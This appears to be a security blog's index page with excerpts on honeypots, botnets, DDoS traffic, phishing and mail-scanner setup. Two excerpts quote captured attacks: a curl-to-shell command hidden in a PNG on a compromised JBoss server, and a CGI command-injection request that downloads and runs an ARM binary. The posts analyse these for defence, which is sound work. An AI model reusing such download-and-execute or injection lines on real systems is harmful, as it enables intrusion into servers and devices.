When upgrading the software (RouterOS) on Mikrotik devices, you should usually also make sure the firmware (RouterBoot) is upgraded to the same level. In the devices’ various management interfaces including command line, the OS will tell you that there are outstanding firmware patches if you ask it, like this: /system routerboard print routerboard: yes current-firmware: […]
Among the many benefits of running a honeypot is gathering the credentials intruders try in order to log in. As explained in some earlier blog posts, my Cowrie honeypots are redirecting secondary connections to another honeypot running INetSim. For example, an intruder logged in to a Cowrie honeypot may use the established foothold to make […]
A discussion forum of one of Redpill Linpro‘s customers has been under attack lately, through a number of DoS and DDoS variants. Today’s attack strain was of the rather interesting kind, as one of its very distinctive identifiers was a suspicious, not to say ridiculous, amount of IP addresses in the incoming X-Forwarded-For HTTP header. […]
By running a Cowrie honeypot, I’m gathering interesting information about various kinds of exploits, vulnerabilities, and botnets. Upon a discovery of a new Linux-based vulnerability – often targeting network routers, IoT devices, and lately many IP camera products – the botnets will usually come in waves, testing the new exploits. The honeypot logs everything the […]
A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one: sh -c curl hxxp://img1.imagehousing.com/0/beauty-287196.png -k|dd skip=2446 bs=1|sh This is a rather elegant way of disguising malicious code. If we first take a look at the png file: […]
Yet another fake LinkedIn invite landed in my inbox today. Just for the fun of it, I decided to dissect the fake invite. The first thing that caught my attention was the email’s subject: Add Me On LinkedIn. Normally, LinkedIn invite requests appear as polite and humble, this one not so much. Next was the […]
My Suricata IDS triggered on an HTTP request to my honeypot this morning: ET WEB_SERVER Suspicious Chmod Usage in URI Further investigation revealed this incoming request: POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%20-O%20/tmp/Arm1%20http://172.247.x.y:85/Arm1;chmod%200777%20/tmp/Arm1;/tmp/Arm1 HTTP/1.1 Host: [redacted] Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.13.0 Content-Length: 0 Authorization: Basic YWRtaW46YWRtaW4= The request seems to take advantage of a […]
Recently I’ve seen an increase in mail spambots identifying with the EHLO string EHLO ylmf-pc. These belong to (or at least stem from) the Cutwail botnet, originally observed as early as 2007. The following table shows the number of attempts over the last two weeks. The numbers are not overwhelming for a private mail server, […]
If there’s a short and sweet installation document for enabling SNMP support in Amavisd-new, I seem to have failed searching for it today. Instead I made my own, partially for documenting my own setup and partially for the benefit of others. This brief installation document assumes you’re running a Ubuntu or Debian system. It will […]
I’ve been running Amavisd-new with scanner components like ClamAV and SpamAssassin on the mail relay for my personal mail for several years. Lately I’ve been thinking that since Amavis supports multiple content scanners I should add another antivirus product. Unfortunately there’s a limited number of free (for home/individual use) antivirus products running on Linux, and […]